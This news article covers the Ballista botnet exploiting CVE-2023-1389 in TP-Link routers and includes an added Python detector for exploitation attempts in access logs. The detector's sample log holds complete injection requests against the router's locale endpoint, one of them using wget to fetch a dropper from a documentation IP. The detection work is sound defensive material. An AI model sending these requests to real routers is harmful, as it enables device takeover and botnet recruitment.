Researchers at the cybersecurity company Cato Networks have discovered that a series of TP-Link routers with unpatched vulnerabilities are being attacked to build a new botnet known as Ballista.
The hacker behind the malware, who is believed to be based in Italy, has been exploiting a firmware vulnerability identified as CVE-2023-1389 to let the botnet spread automatically across the internet through unpatched TP-Link devices.
The US Cybersecurity and Infrastructure Security Agency (CISA) had previously confirmed that CVE-2023-1389 was being actively exploited and ordered federal civilian agencies to patch it. The vulnerability and patch documentation point to a specific TP-Link model, known as the Archer AX21 or AX1800.
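The article does not describe how CVE-2023-1389 is triggered, but a defender watching a fleet of these routers, or a reverse proxy in front of them, mainly wants to spot exploitation attempts in the access logs. The following detector is an added example and is not code from Cato Networks, TP-Link, or the Ballista malware. It assumes the request shape documented in public advisories for CVE-2023-1389 (the locale API under `/cgi-bin/luci/;stok=/locale` with a `form=country` query and a `country=` value that is passed to a shell), and the log lines it scans are constructed for the example, not captured from a real device.

```python
"""Detect likely CVE-2023-1389 exploitation attempts in HTTP access logs.

Added example, not code from the Cato Networks report or from TP-Link.
The endpoint and parameter names (the locale API under
/cgi-bin/luci/;stok=/locale, the form=country and country= fields) are
taken from public advisories for CVE-2023-1389; the log lines below are
constructed, not captured from a real router.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Combined-log-format request field: "METHOD TARGET HTTP/x.y"
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)

# Benign values for the locale API are two-letter country codes. Anything
# else on this endpoint (shell metacharacters, command substitution,
# URL-encoded payloads) is treated as an injection attempt.
SAFE_COUNTRY_RE = re.compile(r"[A-Za-z]{2}")
SHELL_META_RE = re.compile(r"\$\(|`|[;|&<>]")

# Constructed sample: two exploitation attempts from 203.0.113.7, one
# legitimate locale write and one unrelated request from 198.51.100.9.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2025:14:02:11 +0000] "POST /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>/tmp/x) HTTP/1.1" 200 41
198.51.100.9 - - [10/Mar/2025:14:02:15 +0000] "POST /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=IT HTTP/1.1" 200 41
198.51.100.9 - - [10/Mar/2025:14:03:01 +0000] "GET /cgi-bin/luci/;stok=/status?form=all HTTP/1.1" 200 1203
203.0.113.7 - - [10/Mar/2025:14:03:40 +0000] "POST /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%60wget+http%3A%2F%2F203.0.113.7%2Fdropper+-O+%2Ftmp%2Fd%60 HTTP/1.1" 200 41
"""


def parse_request(line):
    """Return (client ip, path, query dict) or None if not a request line."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # parse_qs decodes %xx escapes and '+', so URL-encoded payloads are
    # inspected in their decoded form rather than slipping past the check.
    query = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    return m.group("ip"), parts.path, query


def classify(line):
    """Return a finding dict for a suspicious locale-API request, else None."""
    parsed = parse_request(line)
    if parsed is None:
        return None
    ip, path, query = parsed
    if not path.endswith("/locale") or query.get("form") != "country":
        return None  # not the vulnerable endpoint
    country = query.get("country", "")
    if SAFE_COUNTRY_RE.fullmatch(country):
        return None  # ordinary two-letter country code
    return {
        "ip": ip,
        "operation": query.get("operation"),
        "country": country,
        "shell_meta": bool(SHELL_META_RE.search(country)),
    }


def scan_log(text):
    """Run classify() over every line of an access log and collect findings."""
    return [f for f in (classify(line) for line in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The allow-list on the `country` value is deliberate: matching on specific shell metacharacters alone is easy to evade with encoding or different quoting, whereas a legitimate client only ever sends a two-letter code to this form. Run on the constructed sample, the scanner reports the two requests from 203.0.113.7 and ignores the benign `country=IT` write and the unrelated status call.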
Offek Vardi, a security engineer at Cato Networks, said the researchers are moderately confident that the hacker is based in Italy, given the location of the IP address of the command-and-control (C2) server and the Italian-language strings found in the malware code: "We believe we detected this campaign in its early stages. We saw its evolution since, in a short time, the threat actor modified the initial dropper to allow stealthier connections to the C2 server through the Tor network."
In this particular campaign, the malware allows the attacker to execute arbitrary commands on compromised devices. This suggests that the malware's author may have more ambitious plans than a conventional DDoS payload. Vardi noted that the malware was written so that new capabilities could be added in future variants.
TP-Link routers are in the spotlight
In recent months, US officials have raised the alarm about TP-Link routers, which have been repeatedly exploited by Chinese hackers who used them to breach telecommunications giants and critical infrastructure.
For years, hackers have abused critical vulnerabilities in TP-Link routers to use them as cover for follow-on attacks or to add them to powerful botnets that knock websites offline with junk traffic. The Wall Street Journal reported in December that US agencies were considering banning TP-Link devices.